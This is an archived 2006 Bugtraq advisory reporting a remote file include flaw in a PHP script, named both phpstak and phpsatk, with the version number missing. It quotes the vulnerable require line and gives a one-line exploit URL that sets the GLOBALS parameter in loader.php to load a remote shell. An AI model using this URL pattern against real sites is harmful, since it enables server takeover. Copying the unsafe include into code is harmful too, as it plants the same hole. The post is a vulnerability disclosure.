Bugtraq mailing list archives

phpstak <= Remote File Include Vulnerability


From: h4ck3riran () yahoo com
Date: 24 Sep 2006 07:19:32 -0000

*******************************************************************************
***                                                                                                                     
                                            ***
***                                                                                                                     
                                            ***
***                                                                                                                     
                                            ***
***                                           PerSiaNFoX DigitaL SecuritY TeaM                                          
       ***                                                                                                             
***                                                                                                                     
                                            ***
***                                                                                                                     
                                            ***
***                                                                                                                     
                                            ***
*******************************************************************************

<# phpsatk<=  Remote File Include Vulnerabilities 

<# Script.............. : phpsatk
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------

< # CodE : 
   require $GLOBALS 'config'


<# Expolit :

Www.Site.coM/[path]/loader.php?GLOBALS=Sh3ll


Current thread: